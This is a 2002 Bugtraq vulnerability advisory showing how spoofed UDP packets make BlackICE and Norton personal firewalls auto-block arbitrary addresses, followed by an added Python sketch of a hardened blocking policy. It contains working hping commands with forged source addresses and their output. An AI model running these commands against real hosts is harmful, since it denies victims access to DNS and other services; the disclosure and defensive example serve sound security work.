Bugtraq mailing list archives

Multiple Vendor PC firewall remote denial of services Vulnerability


From: "Yiming Gong" <yiming () security zz ha cn>
Date: Tue, 8 Oct 2002 10:16:06 +0800

Overview
In a default installation, some personal firewall software runs with
its auto-block function enabled. If a packet that looks like a
high-severity attack is sent to such a PC with a spoofed source
address, the firewall immediately blocks the spoofed IP address without
any further checks. An intruder can thus remotely and quickly block a
large number of Internet addresses for a victim PC.

Example
I’ve tested this on BlackICE and Norton personal firewall.

Below are the steps and results of the test on BlackICE:

Step 1: A clean and DEFAULT installation of BlackICE Defender for
server (version 2.9.cap) on a Win2k server PC whose IP address is
ip.add.of.victim.

Step 2: On a Linux box with hping (free software available from
www.hping.org) installed, run the following three commands:
---
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add.of.dnsserver
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.google.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
[root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.networkice.com
HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes

--- ip.add.of.victim hping statistic ---
5 packets tramitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
---
These three commands all do the same thing: send fake trinoo
communication UDP packets to our target machine ip.add.of.victim with
a spoofed IP address (google, networkice, and ip.add.of.dnsserver, our
DNS server).

Result: Each time a command is executed, the BlackICE icon in the
Windows system tray flashes, and an entry is automatically added to
BlackICE's Advanced Firewall Settings which blocks all packets from
the spoofed address. The spoofed IP address becomes unreachable
immediately.

The test steps and results for Norton personal firewall are almost the
same, using hping -e 13 -d 2 -s 6000 -p 2140 -2 ip.of.remote.victimpc
-c 2 -a ip.of.spoofed.address instead.

Vendor Response
I’ve contacted symsecurity () symantec com and NSupport () iss net on Sep 24,
2002. Symantec told me they have forwarded my concerns on to the
appropriate team, and BlackICE replied that, as the product exists now,
there is nothing that can be done to correct this. They hope that
something can be done in a future release.

Affected Versions:
--
I have tested the following products:

BlackICE Defender for server version 2.9.cap
BlackICE Server Protection version 3.5.cdf
Norton personal firewall 2002 (version 4.0)
All are vulnerable.



 
 
-- 
I want a better life



Yiming Gong 
Senior System Administrator 
China Netcom
yiming () security zz ha cn 
http://security.zz.ha.cn 
0086-371-7934907 
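
The auto-block behaviour reported above, next to a policy that applies "further judgement" before blocking, as an added Python example that is not part of the original post and not any vendor's code. The allowlist, the Alert fields, the policy names and every address and signature label are assumptions constructed for illustration; the hardened policy assumes the firewall can tell whether a TCP three-way handshake completed.

```python
import ipaddress
from dataclasses import dataclass

# Hypothetical allowlist: addresses the host must never lose (constructed values).
PROTECTED = {ipaddress.ip_address("192.0.2.53"),  # assumed local DNS server
             ipaddress.ip_address("192.0.2.1")}   # assumed default gateway

@dataclass(frozen=True)
class Alert:
    src: str              # source address as claimed in the packet header
    proto: str            # "udp" or "tcp"
    handshake_done: bool  # True only after a completed TCP three-way handshake
    signature: str        # detection name (constructed label)

def naive_autoblock(alert, blocklist):
    """Behaviour reported in the advisory: block the claimed source at once."""
    blocklist.add(alert.src)
    return "block"

def hardened_autoblock(alert, blocklist, protected=PROTECTED):
    """Always drop the packet; block the source only if it cannot be blindly spoofed."""
    if ipaddress.ip_address(alert.src) in protected:
        return "drop-only: protected address"
    if alert.proto != "tcp" or not alert.handshake_done:
        return "drop-only: source address unverified"
    blocklist.add(alert.src)
    return "block"

def replay(policy, alerts):
    """Run a policy over a list of alerts and return (decisions, blocklist)."""
    blocklist = set()
    decisions = [policy(a, blocklist) for a in alerts]
    return decisions, blocklist

# Constructed alerts: three connectionless detections whose source field
# cannot be trusted, then one detection inside an established TCP session.
SAMPLE_ALERTS = [
    Alert("192.0.2.53", "udp", False, "trinoo-udp"),
    Alert("198.51.100.10", "udp", False, "trinoo-udp"),
    Alert("203.0.113.7", "udp", False, "trinoo-udp"),
    Alert("203.0.113.99", "tcp", True, "http-exploit"),
]

if __name__ == "__main__":
    for policy in (naive_autoblock, hardened_autoblock):
        decisions, blocked = replay(policy, SAMPLE_ALERTS)
        print(policy.__name__, sorted(blocked), decisions)
```

Under the naive policy the assumed DNS server ends up on the blocklist; under the hardened policy only the source seen inside an established TCP session is blocked, while the offending packets are still dropped.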


